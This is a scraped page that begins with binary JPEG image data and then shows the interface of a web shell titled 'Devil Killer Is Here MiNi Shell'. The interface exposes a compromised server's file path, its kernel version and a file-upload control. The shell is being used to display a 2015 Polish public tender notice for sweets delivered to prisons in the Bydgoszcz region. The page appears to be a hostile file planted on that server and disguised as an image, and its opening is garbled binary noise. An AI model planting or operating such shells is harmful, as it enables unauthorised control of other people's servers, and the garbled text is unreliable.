JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150310/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150310/52486-N-2015.html

<p class="kh_header"><b>Gdańsk: Dostawy słodyczy znak sprawy: 1/2015/BIGB O/POTULICE</b><br>
<b>Numer ogłoszenia: 52486 - 2015; data zamieszczenia: 10.03.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Bałtycka Instytucja Gospodarki Budżetowej BALTICA , ul. Kurkowa 12, 80-803 Gdańsk, woj. pomorskie, tel. 58 3231102, faks 58 3231101.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.igbbaltica.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: igb.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy słodyczy znak sprawy: 1/2015/BIGB O/POTULICE.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia: Dostawy słodyczy:
1. Grupa 1:
1) Czekolada mleczna nadziewana różne smaki 100 g, ilość szacunkowa 10000 sztuk. CPV: 15842100-3.
2) Czekolada mleczna z orzechami 100 g, ilość szacunkowa 10000 sztuk. CPV: 15842100-3.
3) Czekolada mleczna 100 g, ilość szacunkowa 10000 sztuk. CPV: 15842100-3.
4) Czekolada mleczna bakaliowa z rodzynkami i orzechami 100 g, ilość szacunkowa 10000 sztuk. CPV: 15842100-3.
5) Czekolada gorzka E.Wedel 100 g, ilość szacunkowa 5000 sztuk. CPV: 15842100-3.
6) Czekolada mleczna nadziewana  E.Wedel 100 g, różne smaki, ilość szacunkowa 5000 sztuk. CPV: 15842100-3.
7) Czekolada mleczna E.Wedel 100 g, ilość szacunkowa 2000 sztuk. CPV: 15842100-3.
8) Czekolada mleczna z całymi orzechami laskowymi Alpen Gold NusseBeiser 100 g, ilość szacunkowa 3000 sztuk. CPV: 15842100-3.
9) Czekolada biała 100 g, ilość szacunkowa 1500 sztuk. CPV: 15842100-3.
10) Czekolada mleczna z orzechami laskowymi Alpen Gold 90 g, ilość szacunkowa 2000 sztuk. CPV: 15842100-3.
11) Czekolada biała bourbon-wanilia Alpen Gold 90 g, ilość szacunkowa 2000 sztuk. CPV: 15842100-3.
12) Czekolada mleczna bakaliowa z rodzynkami i orzechami - terravita 225 g, ilość szacunkowa 3000 sztuk. CPV: 15842100-3.
13) Czekolada mleczna z orzechami - terravita 225 g, ilość szacunkowa 3000 sztuk. CPV: 15842100-3.
14) Czekolada mleczna - terravita 225 g, ilość szacunkowa 3000 sztuk. CPV: 15842100-3.
15) Czekolada mleczna Pytania kartonik - terravita 225 g, ilość szacunkowa 3000 sztuk. CPV:15842100-3.
16) Czekolada mleczna z orzechami laskowymi E.Wedel 100 g, ilość szacunkowa 1500 sztuk. CPV: 15842100-3.
17) Czekolada mleczna z rodzynkami i orzechami laskowymi - milka (Raisin&Nut) 100 g, ilość szacunkowa 1500 sztuk. CPV: 15842100-3.
2. Grupa 2:
1) Baton Mars 47 g. Nugatowe nadzienie, karmel, mleczna czekolada, ilość szacunkowa 12000 sztuk. CPV: 15842220-0.
2) Baton Snickers 50 g. Nugatowe nadzienie, prażone orzeszki ziemne, karmel, ilość szacunkowa 12000 sztuk. CPV: 15842220-0.
3) Baton Lion 42 g. Nadziewany wafel z karmelem i płatkami ryżowymi w polewie kakaowej, ilość szacunkowa 7000 sztuk. CPV: 15842220-0.
4) Baton 3 Bit 41 g. Baton w czekoladzie mlecznej z nadzieniem mlecznym i herbatnikiem, ilość szacunkowa 7000 sztuk. CPV: 15842220-0.
5) Baton KitKat 40 g. Paluszek waflowy w mlecznej czekoladzie, ilość szacunkowa 6000 sztuk. CPV: 15842220-0.
6) Baton Pawełek różne smaki 45 g. Batonik z nadzieniem w mlecznej czekoladzie, ilość szacunkowa 4200 sztuk. CPV: 15842220-0.
7) Baton Twix 51 g (2x25,5 g). Ciasteczka oblane kremem i mleczną czekoladą, ilość szacunkowa 3600 sztuk. CPV: 15842220-0.
8) Baton Kinder Boueno 43 g. Dwa batony w opakowaniu, pojedynczo pakowane. Wafel pokryty mleczną czekoladą, wypełniony mleczno-orzechowym nadzieniem, ilość szacunkowa 3600 sztuk. CPV: 15842220-0.
9) Baton Bounty 57 g. Wiórki kokosowe oblane mleczną czekoladą, ilość szacunkowa 3400 sztuk. CPV: 15842220-0.
10) Wafelek kakaowy w polewie czekoladowej 30 g, ilość szacunkowa 60000 sztuk. CPV: 15842220-0.
11) Wafelek orzechowy w polewie czekoladowej 30 g, ilość szacunkowa 60000 sztuk. CPV: 15842220-0.
12) Wafelek Grześki 36 g, przekładany kremem kakaowym w czekoladzie, ilość szacunkowa 9000 sztuk. CPV: 15842220-0.
13) Wafelek Grześki 36g, przekładany kremem orzechowym w czekoladzie, ilość szacunkowa 9000 sztuk. CPV: 15842220-0.
14) Wafelek Grześki 36 g, przekładany kremem toffi w czekoladzie, ilość szacunkowa 9000 sztuk. CPV: 15842220-0.
15) Wafelek Grześki 28 g, przekładany kremem kakaowym bez czekolady, ilość szacunkowa 9000 sztuk CPV: 15842220-0.
16) Wafle Familijne Jutrzenka różne smaki 180 g, ilość szacunkowa 5000 sztuk. CPV: 15842220-0.
17) Wafelek Princessa różne smaki 35-37 g przekładany kremem oblany mleczną czekoladą, ilość szacunkowa 4000 sztuk. CPV: 15842220-0.
18) Wafelek Prince Polo XXL różne smaki 50 g, ilość szacunkowa 5000 sztuk. CPV: 15842220-0.
19) Wafle teatralne w czekoladzie Kopernik 46 g, ilość szacunkowa 4000 sztuk. CPV: 15842220-0.
20) Milky way 21,5 g baton , ilość szacunkowa 2000 sztuk. CPV: 15842220-0.
21) Rogal 7 Days Chipita o nadzieniu o różnych smakach 60 g, ilość szacunkowa 2000 sztuk. CPV: 15842220-0.
22) Rolada długoterminowa TAGO 200 g, różne smaki, ilość szacunkowa 1500 sztuk. CPV: 15842300-5.
3. Grupa 3:
1) Markizy kakaowe Hit Bahlsen 225 g, ilość szacunkowa 2000 sztuk. CPV: 15842300-5.
2) Markizy kakaowe 400 g - 500 g, ilość szacunkowa 1200 sztuk. CPV: 15842300-5.
3) Chałwa waniliowa  65 g, ilość szacunkowa 1200 sztuk. CPV: 15842300-5.
4) Chałwa różne smaki 65 g, ilość szacunkowa 1200 sztuk. CPV: 15842300-5.
5) Chałwa waniliowa w polewie czekoladowej 50 g , ilość szacunkowa 1200 sztuk. CPV: 15842300-5.
6) Cukierki czekoladowe nadziewane - mieszanka E.Wedel paczkowane 210 g - 240 g, ilość szacunkowa 500 sztuk. CPV: 15842200-4.
7) Cukierki czekoladowe nadziewane - mieszanka 210 g - 240 g, ilość szacunkowa 500 sztuk. CPV: 15842200-4.
8) Cukierki Nimm2 90 g, ilość szacunkowa 1100 sztuk. CPV: 15842300-5.
9) Cukierki Werthers orginal 90 g, ilość szacunkowa 1100 sztuk. CPV: 15842300-5.
10) Cukierki Kopiko 120 g, ilość szacunkowa 600 sztuk. CPV: 15842300-5.
11) Landrynki-karmelki twarde miętowe 80 g, ilość szacunkowa 4800 sztuk. CPV: 15842300-5.
12) Landrynki-karmelki twarde o smaku owocowym 80 g , ilość szacunkowa 4800 sztuk. CPV: 15842300-5.
13) Krówki paczkowane 130, ilość szacunkowa 2000 sztuk. CPV: 15842300-5.
14) Jeżyki Jutrzenka różne smaki 140 g, ilość szacunkowa 1400 sztuk. CPV: 15842300-5.
15) Delicje E.Wedel różne smaki 147 g, ilość szacunkowa 2400 sztuk. CPV: 15842300-5.
16) Pieguski E.Wedel różne smaki 135 g, ilość szacunkowa 1100 sztuk. CPV: 15842300-5.
17) Krakuski florianki 143 g, ilość szacunkowa 1400 sztuk. CPV: 15842300-5.
18) Krakuski serduszka 143 g, ilość szacunkowa 1400 sztuk. CPV: 15842300-5.
19) Krakuski ciastka maślane 150 g, ilość szacunkowa 1400 sztuk. CPV: 15842300-5.
20) Krakuski deserowe z cukrem 150 g, ilość szacunkowa 1400 sztuk. CPV: 15842300-5.
21) Krakuski kokosowe 125 g, ilość szacunkowa 1400 sztuk. CPV: 15842300-5.
22) Biszkopty 120 g, ilość szacunkowa 600 sztuk. CPV: 15842300-5.
23) Biszkopty z galaretką w polewie czekoladowej różne smaki 130 g, ilość szacunkowa 7200 sztuk. CPV: 15842300-5.
24) Herbatniki Petit Beurry 100 g, ilość szacunkowa 3200 sztuk. CPV: 15821200-1.
25) Paluszki solone 70 g - 80 g, ilość szacunkowa 3600 sztuk. CPV: 15842300-5.
26) Sękacz kakaowy 32 g, ilość szacunkowa 1200 sztuk. CPV: 15842300-5.
27) Ptasie mleczko waniliowe w polewie czekoladowej E.Wedel 380 g, ilość szacunkowa 1000 sztuk. CPV: 15842300-5.
28) Ptasie mleczko waniliowe w polewie czekoladowej 500 g, ilość szacunkowa 2000 sztuk. CPV: 15842300-5.
29) Galaretka w czekoladzie różne smaki Jutrzenka 190 g, ilość szacunkowa 400 sztuk. CPV: 15842300-5.
30) Pierniki z nadzieniem paczkowane od 220 g - 240 g różne smaki, ilość szacunkowa 1500 sztuk. CPV: 15842300-5.
31) Pierniki w czekoladzie 400 g , ilość szacunkowa 1200 sztuk. CPV: 15842300-5.
32) Toffifee bombonierka 125 g. Orzech laskowy w karmelu, ilość szacunkowa 250 sztuk. CPV: 15842300-5.
33) Chipsy Frito Lay różne smaki 80 g , ilość szacunkowa 3200 sztuk. CPV: 15842300-5.
34) Ciastka zbożowe 143 g , ilość szacunkowa 700 sztuk. CPV: 15842300-5.
35) Guma do żucia orbit drażetki Pepperm 10 draż. w opakowaniu, ilość szacunkowa 3600 opakowań po 10 draż. CPV: 15842300-5.
36) Guma do żucia orbit drażetki Spearmin 10 draż. w opakowaniu, ilość szacunkowa 3600 opakowań po 10 draż. CPV: 15842300-5.
37) Napój czekoladowy instant - rozpuszczalny 300 g. CPV: 15841000-5, ilość szacunkowa 700 sztuk.
38) Cukierki czekoladowe Malaga - Wawel luz od 2,0 kg - 2,5 kg, ilość szacunkowa 50 kg. CPV: 15842000-2.
39) Cukierki czekoladowe Tiki-Taki - Wawel luz od 2,0 kg - 2,5 kg, ilość szacunkowa 50 kg. CPV: 15842000-2.
40) Cukierki czekoladowe Kasztanki - Wawel luz od 2,0 kg - 2,5 kg, ilość szacunkowa 50 kg. CPV: 15842000-2.
41) Paluszki serowo-cebulowe 220 g - 250 g, ilość szacunkowa 300 sztuk, CPV:15842300-5.
42) Lizaki serduszka, ilość szacunkowa 2400 sztuk, CPV 15842300-5.
43) Lizaki Chupa-Chups, ilość szacunkowa 2000 sztuk, CPV 15842300-5.
44) Draże kokosowe, paczkowane opakowanie o wadze 80 g ilość szacunkowa 4000 sztuk, CPV: 15842300-5.
45) Draże kakaowe paczkowane opakowanie o wadze 80 g ilość szacunkowa 4000 sztuk, CPV: 15842300-5.
46) Draże śmietankowe paczkowane opakowanie o wadze 80 g ilość szacunkowa 4000 sztuk, CPV: 15842300-5.
47) Kamyki orzechowe - kruche orzeszki arachidowe oblane kolorowym lukrem, paczkowane opakowanie o wadze 90 g - 100 g, ilość szacunkowa 1000 sztuk. CPV: 15842400-6.
48) BOMBONIERKA Ferrero Raffaello - opakowanie o wadze 150 g, ilość szacunkowa 200 sztuk. CPV: 15842300-5.
49) Rodzynki w czekoladzie o wadze 100 g, ilość szacunkowa 1000 sztuk. CPV: 15332412-5.
50) Drażetki Mentos o wadze 37 g - 43 g, różne smaki, ilość szacunkowa 1000 sztuk. CPV:15842300-5.
51) Drażetki Tic-Tak o wadze 16 g, różne smaki, ilość szacunkowa 1000 sztuk. CPV:15842300-5.
52) Cukierki Raczki o wadze 120 g, ilość szacunkowa 1000 sztuk. CPV: 15842300-5.
53) Krakersy o wadze 170 g , ilość szacunkowa 1000 sztuk. CPV: 15842300-5.
54) Wafle Knoppers o wadze 25 g, ilość szacunkowa 1000 sztuk. CPV: 15842300-5.
55) Rurki TAGO - opakowania luzowe 3 kg, różne smaki, ilość szacunkowa 300 sztuk. CPV: 15842300-5.
56) Piernik duet TAGO - opakowania luzowe 1,5 kg, ilość szacunkowa 600 sztuk. CPV: 15842300-5.
57) Ciastka kruche z nadzieniem po środku - Słoneczniki TAGO - opakowania luzowe 2 kg, ilość szacunkowa 600 sztuk. CPV: 15842300-5.
58) Ciastka kruche - Śnieżynki TAGO - opakowania luzowe 2 kg, ilość szacunkowa 600 sztuk. CPV: 15842300-5.
59) Jogusie mix PSZCZÓŁKA - opakowanie zbiorcze 3 kg, mieszanka 4 cukierków z nadzieniem mlecznym o smakach: cytrynowym, brzoskwiniowym, malinowym i poziomkowym, ilość szacunkowa 500 sztuk. CPV: 15842300-5.
60) Michałki Piastowskie ODRA - opakowanie 2 kg, cukierki orzechowe oblane czekoladą, ilość szacunkowa 500 sztuk. CPV: 15842300-5.
61) Mieszanka rodzinna MIESZKO - opakowanie zbiorcze 2,5 kg, mieszanka czekoladek i galaretek w czekoladzie deserowej w ośmiu smakach, ilość szacunkowa 500 sztuk. CPV: 15842300-5.
62) Cukierki toffee butter oraz toffee vanilla MIESZKO - opakowanie zbiorcze 3 kg, ilość szacunkowa 500 sztuk. CPV: 15842300-5.
4. Ilości szacunkowe dostarczanych artykułów mogą ulec zmianie w trakcie trwania umowy. Ostateczna ilość zamawianych artykułów będzie wynikała z faktycznych potrzeb zamawiającego w okresie obowiązywania umowy. Zamawiający zastrzegają sobie prawo do nieodebrania całości zamówienia, z zastrzeżeniem, że ilość dostarczonego asortymentu nie będzie mniejsza niż 70 % wielkości całego zamówienia i z tego tytułu wykonawcy nie przysługuje żadne roszczenie finansowe lub prawne.
5. Artykuły nie mogą wykazywać oznak nieświeżości lub zepsucia. Mają być świeże, o dobrym smaku, w zamkniętych i nieuszkodzonych opakowaniach, które posiadają: kod kreskowy oraz nadrukowaną informację o nazwie środka spożywczego (skład), nazwie i adresie producenta, dacie przydatności do spożycia oraz wadze/gramaturze lub ilości j.m. (np. sztuk) w opakowaniu.
6. Termin ważności dostarczanych artykułów - minimum 6 miesięcy, liczony od dnia dostawy. Dostawa artykułów z krótszym terminem ważności może zostać realizowana po uprzednim uzyskaniu zgody od Zamawiającego.
7. Zamawiający dopuszcza możliwość dostaw artykułów w opakowaniu o większej gramaturze lub ilości sztuk w opakowaniu (tzw. promocja) niż określone w siwz w rozdziale III (dotyczy tylko w okresie realizacji zamówienia na podstawie umowy).
8. Dopuszczalne są oferty równoważne, tzn. artykuły o innych nazwach handlowych niż określone przez zamawiającego, pod warunkiem, że będą posiadały parametry tj. gramaturę lub pojemność, albo ilość sztuk w opakowaniu taką samą jak opisany przez zamawiającego dany przedmiot zamówienia. W przypadku, kiedy przedmiot zamówienia został przez zamawiającego opisany za pomocą przedstawienia jego składu, to produkt równoważny oferowany przez wykonawcę w swoim składzie posiada takie same składniki jakie w opisie przedmiotu zamówienia zawarł zamawiający. Jeżeli opis przedmiotu zamówienia oprócz składu posiada również opis procentowego (%) udziału danego składnika w składzie artykułu, to produkt równoważny oferowany przez wykonawcę w swoim składzie posiada te same składniki, a udział procentowy (%) poszczególnych składników nie może być większy lub mniejszy niż 10% od opisanego przez zamawiającego procentowego (%) udziału danego składnika w składzie artykułu. Ponadto inne parametry produktu równoważnego oferowanego przez wykonawcę, w szczególności dotyczące smaku, aromatu, koloru, konsystencji nie mogą znacząco różnić się od artykułu opisanego przez zamawiającego. Na wykonawcy ciąży udowodnienie, że produkt równoważny spełnia wymogi i opis określony przez zamawiającego. W przypadku oferowania produktów równoważnych wykonawca do oferty załącza wypełniony załącznik nr 5 do siwz, tj. formularz dotyczący porównania parametrów artykułów.
9. Miejsce, sposób, terminy dostaw oraz forma i termin płatności.
1) Wykonawca dostarczać będzie ww. artykuły na swój koszt, zgodnie z wymogami sanitarnymi w sposób zapobiegający utracie walorów smakowych i odżywczych do magazynów Zamawiającego zlokalizowanych na terenie:
a) Zakładu Karnego w Potulicach, ul. Aleja Parkowa 1
b) Aresztu Śledczego w Bydgoszczy, ul. Wały Jagiellońskie 4
c) Zakładu Karnego w Bydgoszczy-Fordonie, ul. Rynek 8
d) Zakładu Karnego w Koronowie, ul. Bydgoska 27
e) Aresztu Śledczego w Chojnicach, ul. Pietruszkowa 4
f) Zakładu Karnego Nr 1 w Grudziądzu, ul. Wybickiego 10  22
g) Zakładu Karnego Nr 2 w Grudziądzu, ul. Sikorskiego 13  17
h) Zakładu Karnego w Inowrocławiu, ul. Gabriela Narutowicza 46
i) Aresztu Śledczego w Toruniu, ul. Piekary 53
j) Zakładu Karnego we Włocławku, ul. Bartnicka 10
k) Oddziału Zewnętrznego Aresztu Śledczego w Bydgoszczy, ul. Toruńska 276
l) Kawiarni ODK Zacisze, 89-526 Lubiewo.
2) Realizacja dostaw do magazynu w uzgodnionych terminach, w godz. 8:00-12:00.
3) Termin płatności: 30 dni, forma płatności: przelew..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.84.21.00-3, 15.84.22.20-0, 15.84.23.00-5, 15.84.22.00-4, 15.82.12.00-1, 15.33.24.12-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. W celu wykazania spełniania przez wykonawców warunków, o których mowa w art. 22 ust. 1 ustawy Pzp, tj. warunków określonych w niniejszej siwz w rozdziale VIII pkt 1, których opis sposobu oceny spełniania został dokonany w ogłoszeniu o zamówieniu oraz w niniejszej siwz - rozdział VIII pkt 3, wykonawca składa do oferty następujące dokumenty:
1)	podpisane oświadczenie, o spełnianiu warunków udziału w postępowaniu (załącznik nr 2 do siwz).
2. W celu wykazania braku podstaw do wykluczenia wykonawców z postępowania o udzielenie zamówienia, o których mowa w art. 24 ust. 1 ustawy Pzp, tj. warunków określonych w niniejszej siwz w rozdziale VIII pkt 2, których opis sposobu oceny spełniania został dokonany w ogłoszeniu o zamówieniu oraz w niniejszej siwz - rozdział VIII pkt 3, wykonawca składa do oferty następujące dokumenty:
1) podpisane oświadczenie o braku podstaw do wykluczenia (załącznik nr 3 do siwz);
2) aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy Pzp, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3.	W celu wykazania braku podstaw do wykluczenia wykonawców z postępowania o udzielenie zamówienia, o których mowa w art. 24 ust. 2 pkt 5 ustawy Pzp wykonawca składa do oferty: zgodnie z art. 26 ust. 2d ustawy Pzp listę podmiotów należących do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. Nr 50, poz. 331, z pózn. zm.) albo informację o tym, że wykonawca nie należy do grupy kapitałowej (załącznik nr 4 do siwz).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. W celu wykazania spełniania przez wykonawców warunków, o których mowa w art. 22 ust. 1 ustawy Pzp, tj. warunków określonych w niniejszej siwz w rozdziale VIII pkt 1, których opis sposobu oceny spełniania został dokonany w ogłoszeniu o zamówieniu oraz w niniejszej siwz - rozdział VIII pkt 3, wykonawca składa do oferty następujące dokumenty:
1)	podpisane oświadczenie, o spełnianiu warunków udziału w postępowaniu (załącznik nr 2 do siwz).
2. W celu wykazania braku podstaw do wykluczenia wykonawców z postępowania o udzielenie zamówienia, o których mowa w art. 24 ust. 1 ustawy Pzp, tj. warunków określonych w niniejszej siwz w rozdziale VIII pkt 2, których opis sposobu oceny spełniania został dokonany w ogłoszeniu o zamówieniu oraz w niniejszej siwz - rozdział VIII pkt 3, wykonawca składa do oferty następujące dokumenty:
1) podpisane oświadczenie o braku podstaw do wykluczenia (załącznik nr 3 do siwz);
2) aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy Pzp, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3.	W celu wykazania braku podstaw do wykluczenia wykonawców z postępowania o udzielenie zamówienia, o których mowa w art. 24 ust. 2 pkt 5 ustawy Pzp wykonawca składa do oferty: zgodnie z art. 26 ust. 2d ustawy Pzp listę podmiotów należących do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. Nr 50, poz. 331, z pózn. zm.) albo informację o tym, że wykonawca nie należy do grupy kapitałowej (załącznik nr 4 do siwz).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. W celu wykazania spełniania przez wykonawców warunków, o których mowa w art. 22 ust. 1 ustawy Pzp, tj. warunków określonych w niniejszej siwz w rozdziale VIII pkt 1, których opis sposobu oceny spełniania został dokonany w ogłoszeniu o zamówieniu oraz w niniejszej siwz - rozdział VIII pkt 3, wykonawca składa do oferty następujące dokumenty:
1)	podpisane oświadczenie, o spełnianiu warunków udziału w postępowaniu (załącznik nr 2 do siwz).
2. W celu wykazania braku podstaw do wykluczenia wykonawców z postępowania o udzielenie zamówienia, o których mowa w art. 24 ust. 1 ustawy Pzp, tj. warunków określonych w niniejszej siwz w rozdziale VIII pkt 2, których opis sposobu oceny spełniania został dokonany w ogłoszeniu o zamówieniu oraz w niniejszej siwz - rozdział VIII pkt 3, wykonawca składa do oferty następujące dokumenty:
1) podpisane oświadczenie o braku podstaw do wykluczenia (załącznik nr 3 do siwz);
2) aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy Pzp, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
